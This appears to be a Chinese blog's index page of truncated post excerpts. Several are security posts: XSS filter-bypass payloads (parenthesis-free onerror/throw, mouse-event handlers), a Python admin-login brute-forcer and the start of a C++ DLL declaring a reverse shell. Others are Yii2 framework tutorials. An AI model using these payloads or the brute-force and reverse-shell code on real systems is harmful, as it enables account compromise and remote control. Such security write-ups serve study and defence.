蜗居

隐藏文章最好的办法：跨站脚本攻击(Cross Site Scripting)，为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。 Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters，在其...

0×00起因     这期XSS挑战的起因是在阅读“Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters”过后，在其中发现了一个很有趣的话题。那就是在圆括号被过滤的情况下，如何去执行javascript。测在文中笔者给出来了这样的解决方案： <a onmouseover="javascript:window.onerror=alert;throw 1>  ...

作者为monyer 1、onmouseenter：当鼠标进入选区执行代码 <div style="background-color:red" onmouseenter="alert(bem)">123456</div> 2、onmouseleave：当鼠标离开选区执行代码 <DIV onmouseleave="alert(bem)" style="BACKGROUND-COLOR: red">123456</DIV> 3、onmousewheel：当鼠标在选区滚轮时执行代码 <DIV onmousewheel="alert(bem)" style...

说实话能找到这篇文字也是巧合，曾经的大牛：Mramydnei，现在已不知何处，曾经的法克论坛，现在已经烟消云散。 文章作者：Mramydnei 来源：法克论坛 （已关闭，别闹，博主我曾经还是核心元老呢） 本博主自认为，我博客应该是网上保存的最完整的带来源带图带作者的博客文章了。 最近认识了个新基友，天天找我搞 XSS,搞了三天，感觉这一套程序还是很...

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 # -*- coding: utf-8 -*- # 利用python 写的多线程爆破后台用户名+密码(自备字典),比较实用,即使是在信息安全这么重视的今天,还是有人不加验证码或者异常访问限制之...

作者：lostwolf 地址：https://www.t00ls.net/thread-39410-1-1.html // dllmain.cpp : 定义 DLL 应用程序的入口点。 #include "stdafx.h" #include #include #pragma comment(lib,"ws2_32") void reverse_shell(); WSADATA wsaData; SOCKET Winsock; SOCKET Sock; struct sockaddr_in hax; STARTUPINFO ini_processo; PROCESS_INFORMATION processo_info; BOOL WINAPI D...

1、单个文件上传 首先建立一个模型models/UploadForm.php,内容如下 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 namespace app\models;   use yii\base\Model; use yii\web\UploadedFile;   /** * UploadForm is the model behind the upload form. */ class UploadForm extends Model { /** * @var UploadedFile file ...

收集了网络上GridView出现的大部分问题做一个总结，希望有一个能帮助到你。 如果下面有没说到的GridView常见问题，下方留言，我会进行补充。 下拉搜索 日期格式化并实现日期可搜索 根据参数进行是否显示 链接可点击跳转 显示图片 html渲染 自定义按钮 设定宽度等样式 自定义字段 自定义行样式 增加按钮调用js操作 实现批量删除案例 批量删除 禁止排序 table加表头 字段内容...

required : 必须值验证属性 [['字段名'],required,'requiredValue'=>'必填值','message'=>'提示信息']; #说明:CRequiredValidator 的别名, 确保了特性不为空. email : 邮箱验证 ['email', 'email']; #说明:CEmailValidator的别名,确保了特性的值是一个有效的电邮地址. match : 正则验证 [['字段名'],'match','pattern'=>'正则表达式','message'=>'提示信息']; [...